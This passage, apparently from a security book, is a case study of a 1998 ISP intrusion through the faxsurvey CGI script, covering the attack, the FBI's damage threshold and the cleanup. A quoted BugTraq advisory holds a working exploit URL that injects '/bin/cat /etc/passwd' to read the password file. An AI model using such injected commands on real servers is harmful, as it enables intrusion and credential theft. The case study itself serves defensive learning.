HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
SERVER_ADMIN=mvol@vineyard.net
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode: :al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
After the intrusion, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that the Boston office had a damage threshold of $8,000 that needed to be exceeded before an investigation could be opened. As this threshold had not been met, no investigation would take place. While such minimums are understandable, they are unfortunate for two reasons:
• Many attacks are conducted by relatively young offenders, who might cease such activity if they received a warning or, at most, a suspended sentence. The lack of any official investigation and follow-up only encourages these attackers to engage in larger and larger crimes until they are responsible for serious damage.
• In this case, the attacker appeared to be quite sophisticated. It’s quite possible that the attacker was engaged in other illegal activities that usually go by without anyone noticing. There are many cases in which the investigation of relatively small crimes has led law enforcement agencies to significant criminal enterprises. For example, it was a 75-cent accounting discrepancy that caused Cliff Stoll to track down a computer hacker who was ultimately found to be breaking into US commercial and military computers at the behest of the Soviet Union (a story detailed in Stoll’s classic hacker thriller, The Cuckoo’s Egg).
As it turns out, the vulnerability in the faxsurvey script had been reported over the BugTraq mailing list nearly three months prior to the attack. Either nobody from the ISP had been reading the BugTraq mailing list, or else no one was aware that the faxsurvey script had been installed:
Date: Tue, 4 Aug 1998 07:41:24 -0700
Reply-To: dod@muenster.net
From: Tom <dod@MUENSTER.NET>
Subject: remote exploit in faxsurvey cgi-script
Hi!
There exists a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.
All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.
AFAIK the problem exists in the call of 'eval'.
I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de> told me that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.
After the break-in, the ISP performed the following cleanup:
• An immediate backup of all disks was done. This backup was preserved as evidence in the event that damage was discovered that needed to be addressed.
• The system was scanned for new privileged files. None were found.
• Permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs.
• Key programs were compared with the distribution CD-ROM to determine if any had been modified. They had not been.
• All log files were manually examined for additional suspicious activity. None was found.
• After a week, the router rule blocking access to SplitRock was removed.